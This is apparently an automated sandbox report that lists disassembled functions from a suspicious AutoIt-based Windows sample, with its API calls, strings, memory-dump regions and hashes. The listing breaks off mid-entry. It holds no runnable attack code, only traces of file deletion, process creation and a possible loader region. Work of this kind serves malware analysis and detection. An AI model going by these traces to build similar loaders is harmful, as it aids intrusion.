DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B12C05
DeleteFileW.KERNEL32(?), ref: 00B12C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B12C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B12CAE
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B12CC0

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: c6a17ecb8c961d34d4f0ccdee5d38abe476cfe6537d08d3f0f2ca16d405ab2ac
Instruction ID: 287c0587019e182a2bc7a20f09509a90c6d3f765c2f0445b1b4b16ed20e236d9
Opcode Fuzzy Hash: c6a17ecb8c961d34d4f0ccdee5d38abe476cfe6537d08d3f0f2ca16d405ab2ac
Instruction Fuzzy Hash: EFB14C72D00119ABDF11DBA4CD85EDEBBBDEF49350F5040AAF609E7141EB309A948FA1

Function 017C5E68 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 164
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 017C5D58: Sleep.KERNELBASE(000001F4), ref: 017C5D69

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 017C5FC3

Strings

WAFMZYMK5ID403A8PGXS1PUT2D, xrefs: 017C6043, 017C6046

Memory Dump Source

Source File: 00000000.00000002.2067721187.00000000017C3000.00000040.00000020.00020000.00000000.sdmp, Offset: 017C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17c3000_oagkiAhXgZ.jbxd

Similarity

API ID: CreateFileSleep
String ID: WAFMZYMK5ID403A8PGXS1PUT2D
API String ID: 2694422964-3466004450
Opcode ID: c4d00ab49a2bc44f0b84abade9a46165060c935c2c0599ffbcef42d9ec0de6a2
Instruction ID: 847afc2d31d54b5d3c7048294d5a902baedd36a3f43ddb64b9f9baac7f58f2b1
Opcode Fuzzy Hash: c4d00ab49a2bc44f0b84abade9a46165060c935c2c0599ffbcef42d9ec0de6a2
Instruction Fuzzy Hash: 0561A530D04288DAEF11DBB8C848BEEBB75AF15704F04419DE2487B2C1D7BA1B89CB65

Function 00AA3B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00AA3B0F,SwapMouseButtons,00000004,?), ref: 00AA3B40
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00AA3B0F,SwapMouseButtons,00000004,?), ref: 00AA3B61
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00AA3B0F,SwapMouseButtons,00000004,?), ref: 00AA3B83

Strings

Control Panel\Mouse, xrefs: 00AA3B3E

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 369f0fe24d2bac802ef00e719e7d5b9bdacdb6263c8dc3b08a069fa9e64e9ed2
Instruction ID: 1c6c3f77131a88db3264d5a5e5ac40caa71353114347710129561b951e150dc0
Opcode Fuzzy Hash: 369f0fe24d2bac802ef00e719e7d5b9bdacdb6263c8dc3b08a069fa9e64e9ed2
Instruction Fuzzy Hash: EB112AB6511208FFDF218FA5DC85AAEBBB9EF05744B104459B806E7150D7719E409760

Function 00AADFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00AF32B7

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: 3e0d67a6b570d5edfe9625fdc15ad4a32f40ef2c37d87e9d54b053558be620f6
Instruction ID: 62852d6c09eb4c2ca203595fdd0ca022650f651a3cdb9b8621f08b72396b1f4d
Opcode Fuzzy Hash: 3e0d67a6b570d5edfe9625fdc15ad4a32f40ef2c37d87e9d54b053558be620f6
Instruction Fuzzy Hash: 8CC26771A00215CFCF24CF98C881AADB7F1FF5A310F248569E916AB291D775ED81CBA1

Function 00AAEC40 Relevance: 5.7, APIs: 3, Instructions: 1195COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00AAFE66

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: f9e9f00e87bd31ed4c711b9bc3918f15de89858c7cd837037525135745b7547c
Instruction ID: 6b6bb12bea8775fc60dd5c8cff66762827b69d37eb06894ae63e7adb823fe618
Opcode Fuzzy Hash: f9e9f00e87bd31ed4c711b9bc3918f15de89858c7cd837037525135745b7547c
Instruction Fuzzy Hash: FFB27A74A08340CFCB28CF58C480A2AB7F1BB9A314F24496DF9999B391D771EC45CB92

Function 00ABFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00AC0668

Part of subcall function 00AC32A4: RaiseException.KERNEL32(?,?,?,00AC068A,?,00B71444,?,?,?,?,?,?,00AC068A,00AA1129,00B68738,00AA1129), ref: 00AC3304

__CxxThrowException@8.LIBVCRUNTIME ref: 00AC0685

Strings

Unknown exception, xrefs: 00AC0692

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: f2917d064b3f4f0ce3e1d9302fa3ff5c04df10dd9c93195a671292a3151a551e
Instruction ID: 2379d29aa15c45dc296b77c399c313ca54fe0eda36105070e9f236722beee241
Opcode Fuzzy Hash: f2917d064b3f4f0ce3e1d9302fa3ff5c04df10dd9c93195a671292a3151a551e
Instruction Fuzzy Hash: B9F0C23490020DBB8F00BB64DD4AEDE7BAC5E00354F618579B814D65A2EFB1DA25C680

Function 017C4A78 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 017C4ABD
ExitProcess.KERNEL32(00000000), ref: 017C4ADC

Strings

D, xrefs: 017C4A89

Memory Dump Source

Source File: 00000000.00000002.2067721187.00000000017C3000.00000040.00000020.00020000.00000000.sdmp, Offset: 017C3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17c3000_oagkiAhXgZ.jbxd

Similarity

API ID: Process$CreateExit
String ID: D
API String ID: 126409537-2746444292
Opcode ID: 4638e4dcbcb64820f1c19d6545d26c0fb6ea82a3cd30bab000e26f1f9ebc6855
Instruction ID: bafb5ff288a5ae9d436cec4a1ec9bbb776d540117adc107032cedf96742e4af8
Opcode Fuzzy Hash: 4638e4dcbcb64820f1c19d6545d26c0fb6ea82a3cd30bab000e26f1f9ebc6855
Instruction Fuzzy Hash: ABF0EC7154024CABDF60EFE4CC49FEEB778BF48B01F44850CBB0A9A184DA7496488B61

Function 00B13017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00B1302F
GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00B13044

Strings

aut, xrefs: 00B13038

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 88d1f87cff392d4d0d3b1bf1f5d99104bb84361694049390f1fd79b18db159ae
Instruction ID: d0f77de379d5532870f631cfd3f167c996d42a227e90dec48ff3a68bc35dfb95
Opcode Fuzzy Hash: 88d1f87cff392d4d0d3b1bf1f5d99104bb84361694049390f1fd79b18db159ae
Instruction Fuzzy Hash: 20D05E7254032867DA20A7E4AC0EFCB3F6CDB04750F0002A1BA55E30A1DEB49984CBD0

Function 00B27F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00B282F5
TerminateProcess.KERNEL32(00000000), ref: 00B282FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 00B284DD

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: b00bb7d392a3e9fb46bd69f9f85f2ba6b853db432d2ff1f1e5060d3a9ba8657f
Instruction ID: edcdb04ed8f513ed5c04133d509c9acce9e6c4dc2db73653db593a7fed14a79e
Opcode Fuzzy Hash: b00bb7d392a3e9fb46bd69f9f85f2ba6b853db432d2ff1f1e5060d3a9ba8657f
Instruction Fuzzy Hash: F1127B719083119FD714DF28D480B6ABBE5FF89318F14899DE8998B392CB31ED45CB92

Function 00AD5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3765a17a088ad00a94604bc2f1e24b3ff6f8bdbeb21de5c8706ec742e1e045d
Instruction ID: 2e863dba7697eb9b513e51b97f007d382b624d0aafe471c1628d29b9da0e7518
Opcode Fuzzy Hash: a3765a17a088ad00a94604bc2f1e24b3ff6f8bdbeb21de5c8706ec742e1e045d
Instruction Fuzzy Hash: 1D519D75D10A09AFDB21AFB8C945FEEBBB8AF05310F14005BF406AB391D7719A01DB61

Function 00AA10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AA1BF4
Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AA1BFC
Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AA1C07
Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AA1C12
Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AA1C1A
Part of subcall function 00AA1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AA1C22

Part of subcall function 00AA1B4A: RegisterWindowMessageW.USER32(00000004,?,00AA12C4), ref: 00AA1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AA136A
OleInitialize.OLE32 ref: 00AA1388
CloseHandle.KERNEL32(00000000,00000000), ref: 00AE24AB

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 135fe70a073280cf2685ef2b45851f3bb26239ddb0b4052aa52d183c0ec0da37
Instruction ID: 898d4cabcbd235c0f3dea2378916646e41f1220672ac38de7aa56b50b913bb9d
Opcode Fuzzy Hash: 135fe70a073280cf2685ef2b45851f3bb26239ddb0b4052aa52d183c0ec0da37
Instruction Fuzzy Hash: 2A71ACB59212008FC388EFBDAD466553BE5FBA9344B558A6AD41ED73A1EF308480CF71

Function 00B0C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AA3A04

Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B0C259
KillTimer.USER32(?,00000001,?,?), ref: 00B0C261
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B0C270

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 77fcc27eb6df3668fd491363219abde984c714da5acdf3ce6d990a17f0036d7a
Instruction ID: b24c3d488a910d5185646ffd86d41bd41f7cfc608ba4ad45bbfe2c63ead61dfa
Opcode Fuzzy Hash: 77fcc27eb6df3668fd491363219abde984c714da5acdf3ce6d990a17f0036d7a
Instruction Fuzzy Hash: 8E319371904344AFEB229FA48895BEBBFECAF06304F1044DEE5DAA7281C7745A84CB51

Function 00AD86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,00AD85CC,?,00B68CC8,0000000C), ref: 00AD8704
GetLastError.KERNEL32(?,00AD85CC,?,00B68CC8,0000000C), ref: 00AD870E
__dosmaperr.LIBCMT ref: 00AD8739

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: a6ca98934e021c38785ca306c36c529d36a2cc6d3eb1aeaca82b3e6789af3521
Instruction ID: 7f29f3d6a3f8b9f90d643b5500d71dd3fb4e38d7051e2bb148b320ade98312f8
Opcode Fuzzy Hash: a6ca98934e021c38785ca306c36c529d36a2cc6d3eb1aeaca82b3e6789af3521
Instruction Fuzzy Hash: 82016D33E056602AD6247734A945B7E7B598B92B74F39011FF81B9F3D2DEB8CC819290

Function 00AADB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 00AADB7B
DispatchMessageW.USER32(?), ref: 00AADB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AADB9F
Sleep.KERNEL32(0000000A), ref: 00AADBB1
TranslateAcceleratorW.USER32(?,?,?), ref: 00AF1CC9

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: b8fed73eb1fc5f2bd50375ecd4bea0f54423873f4a27aa23bd886fdc347adeca
Instruction ID: 3ca273baf60c87397e1d7c14a48edceecf402defb06e31c982dd8582897a097d
Opcode Fuzzy Hash: b8fed73eb1fc5f2bd50375ecd4bea0f54423873f4a27aa23bd886fdc347adeca
Instruction Fuzzy Hash: 47F05E31644344DBE730CBA4CC49FEA77BCEB49310F104918F65A930C0DB30A8888B26

Function 00B12FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00B12CD4,?,?,?,00000004,00000001), ref: 00B12FF2
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00B12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B13006
CloseHandle.KERNEL32(00000000,?,00B12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B1300D

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: 19f946fc115328531cf2995bfbae060d9333ac61dcd0fe98dcdd74481076c3a9
Instruction ID: 05b14bf4ff7330c7afcc80a7063a458893e18b1e6f7ee5b01b5d6596a34fefe3
Opcode Fuzzy Hash: 19f946fc115328531cf2995bfbae060d9333ac61dcd0fe98dcdd74481076c3a9
Instruction Fuzzy Hash: C2E0863228061077D2301795BC0DFCF3E5CD78AF71F204210F719760D04AA0590153A8

Function 00AB1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00AB17F6

Strings

CALL, xrefs: 00AB17C6

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 067d6b17fded2d71f0877f3c8e3502df3e397f52f9828c156a8a5f1c05fced5f
Instruction ID: 560ebead766195665d5c8d34b91e5575aa9704b2068fc076f93ef5a2fe500a1e
Opcode Fuzzy Hash: 067d6b17fded2d71f0877f3c8e3502df3e397f52f9828c156a8a5f1c05fced5f
Instruction Fuzzy Hash: 51229D70608301DFC714DF14C5A0AAABBF9BF85314F688A5DF5968B3A2D731E845CB92

Function 00B16EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B16F6B

Part of subcall function 00AA4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00B16F5A, 00B16F63

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 87141ae9665403f8ea5db6c670e5071046132b14d18dc125c82ee99f5fb7c782
Instruction ID: 1db5d5c0eb1b841c2188220d5746cc01351c6029cd31ea63c4bf80c7da0cb430
Opcode Fuzzy Hash: 87141ae9665403f8ea5db6c670e5071046132b14d18dc125c82ee99f5fb7c782
Instruction Fuzzy Hash: 3BB180315082019FCB14EF20C9919AFB7E5EF99310F54895DF496972A2EF30ED89CB92

Function 00AA2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00AE2C8C

Part of subcall function 00AA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA3A97,?,?,00AA2E7F,?,?,?,00000000), ref: 00AA3AC2

Part of subcall function 00AA2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00AA2DC4

Strings

X, xrefs: 00AE2C5A

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 0803ef4439ec8bea52cd00fc473689ddececb4cc96e866101faaf8bec706c269
Instruction ID: a393f0f79a8c1b2ca6d93ac26e5edd9070953d08ba24f09558c748cab1af95dd
